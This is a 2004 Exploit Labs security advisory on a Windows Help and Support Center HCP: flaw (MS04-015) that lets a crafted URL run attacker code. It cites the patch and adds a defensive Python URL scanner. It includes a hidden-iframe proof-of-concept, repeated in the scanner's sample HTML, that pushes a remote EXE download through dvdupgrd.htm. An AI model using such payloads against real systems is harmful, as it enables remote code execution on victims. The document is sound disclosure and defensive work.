
Exploit Labs Security Advisory 2003.27

Posted May 12, 2004
Authored by Donnie Werner, Exploit Labs | Site exploitlabs.com

Exploitlabs.com Advisory 27 - Microsoft Windows Help and Support Center has a vulnerability due to an unspecified input validation error. This can be exploited via the HCP protocol on Microsoft Windows XP and Microsoft Windows 2003 through Internet Explorer or Outlook and allows for arbitrary code execution.

tags | advisory, arbitrary, code execution, protocol
systems | windows
SHA-256 | d988b8210aca1e91cb4d3d9dd5b3f573ea60e02d6175fb32fad685eae2dc0074

------------------------------------------------------------
- EXPL-A-2003-027 exploitlabs.com Advisory 027 -
------------------------------------------------------------
- Windows Help Center - Dvdupgrade -



OVERVIEW
========
"Help and Support Center (HSC) is a feature in Windows that provides
help on a variety of topics." It can also be accessed via HCP: URLs.
HSC is installed by default on Windows XP and Windows Server 2003 systems.

An input validation vulnerability in HSC exposes users to remote code
execution: an attacker can run arbitrary code when the victim opens a
specially formatted HCP: URL. The user may be directed to such a URL
automatically when a web page is viewed. The issue can also be
exploited via e-mail.


AFFECTED PRODUCTS
=================
Microsoft Windows Operating Systems with Help and Support Center

Microsoft Windows XP and Microsoft Windows XP Service Pack 1
Microsoft Windows XP 64-Bit Edition Service Pack 1
Microsoft Windows XP 64-Bit Edition Version 2003
Microsoft Windows Server 2003


Files involved:
%windir%\PCHealth\HelpCtr\Binaries\HelpCtr.exe
%windir%\PCHEALTH\HELPCTR\System\DVDUpgrd.htm
%windir%\PCHEALTH\HELPCTR\System\DVDUpgrd.js


DETAILS
=======
The HSC installation contains various HTML and JavaScript files, which
are intended for HSC's internal use. The HTML files belong to the
My Computer zone because they require, for example, the ability to
launch external helper programs from JavaScript.

By using a specially crafted URL, an attacker can cause the user's local
machine to start helpctr.exe in the local context and pass the injected
URL to the application. The user is then presented with the Help and
Support DVD Upgrade dialog in Help and Support Center.

On the DVD Upgrade page, the injected URL is now linked to the "Upgrade
now" button. Pressing the Upgrade now button presents the user with an
Open/Save dialog box for the offending (attacker's) file.


This allows an attacker to initiate the DVD Upgrade action in HSC and
inject JavaScript code which will run in the context of these HTML
files, specifically "HCP://system/DVDUpgrd/dvdupgrd.htm". In this
way the attacker can run scripts in the My Computer zone, which can,
for example, download and start an attacker-supplied EXE program.

As an aside, no URL activity is displayed, and Help and Support Center
has no address bar or status bar.
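Added example (not part of the advisory): a small Python scanner that pulls HCP: URLs out of HTML or HTML e-mail bodies and flags the dvdupgrd.htm?website= pattern described above, the kind of check a mail gateway or proxy filter could apply; the sample page below is constructed and uses placeholder hosts.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample page: a hidden 1x1 iframe of the kind the advisory
# describes, a meta-refresh variant, a benign HCP: link, and an unrelated iframe.
SAMPLE_HTML = """
<html><body>
<a href="hcp://system/homepage.htm">Open Help</a>
<iframe src="HCP://system/DVDUpgrd/dvdupgrd.htm?website=example.invalid/poc/dvdupgd.exe"
        width="1" height="1"></iframe>
<iframe src="http://example.invalid/frame.html" width="300" height="200"></iframe>
<meta http-equiv="refresh"
      content="0;url=hcp://system/DVDUpgrd/dvdupgrd.htm?website=example.invalid/x.exe">
</body></html>
"""

# Any src=, href= or meta-refresh url= value whose scheme is hcp: (case-insensitive).
HCP_URL_RE = re.compile(r"""(?:src|href|url)\s*=\s*["']?\s*(hcp:[^"'>\s]+)""",
                        re.IGNORECASE)


def find_hcp_urls(html: str) -> list:
    """Return every HCP: URL referenced from the markup, in document order."""
    return [m.group(1) for m in HCP_URL_RE.finditer(html)]


def classify_hcp_url(url: str) -> dict:
    """Describe one HCP: URL: which HSC page it targets and whether it carries
    the website= parameter that dvdupgrd.htm wires to its 'Upgrade now' button."""
    parts = urlsplit(url)                      # hcp://system/DVDUpgrd/... splits like http
    target = (parts.netloc + parts.path).lower()
    params = parse_qs(parts.query)
    injected = params.get("website", [""])[0]  # attacker-controlled download location
    return {
        "url": url,
        "target": target,
        "injected_website": injected,
        "suspicious": target.endswith("/dvdupgrd.htm") and bool(injected),
    }


def scan_html(html: str) -> list:
    """Return only the HCP: URLs that match the DVD Upgrade injection pattern."""
    return [c for c in map(classify_hcp_url, find_hcp_urls(html)) if c["suspicious"]]


if __name__ == "__main__":
    for hit in scan_html(SAMPLE_HTML):
        print("suspicious HCP URL -> %s (payload host: %s)"
              % (hit["target"], hit["injected_website"]))
```

Plain HCP: links to other HSC pages are reported by find_hcp_urls but not flagged, so the scanner can also be used to inventory legitimate HCP: usage before blocking the scheme outright.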



SOLUTION
========
Microsoft was contacted on March 18th, 2004. A patch has been
produced to correct the vulnerability. They have issued the
following:

Microsoft Security Bulletin MS04-015
Vulnerability in Help and Support Center Could Allow Remote Code Execution
(840374)
Issued: May 11, 2004
Version: 1.0
Impact of Vulnerability: Remote Code Execution
Maximum Severity Rating: Important
Recommendation: Customers should install the update at the earliest
opportunity.

Information about the vulnerability and the patch can be found at

http://www.microsoft.com/technet/security/bulletin/ms04-015.mspx



PROOF OF CONCEPT
================
<iframe
src="HCP://system/DVDUpgrd/dvdupgrd.htm?website=exploitlabs.com/msnspoof/poc/dvdupgd/dvdupgd.exe"
width="1" height="1">
</iframe>



http://exploitlabs.com/msnspoof/poc/
http://exploitlabs.com/msnspoof/poc/index2.html

http://exploitlabs.com/msnspoof/poc/index3.jpg



CREDITS
=======
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs

Donnie Werner
Information Security Specialist
security@exploitlabs.com
--
Web: http://exploitlabs.com
Ph: (360)-312-8011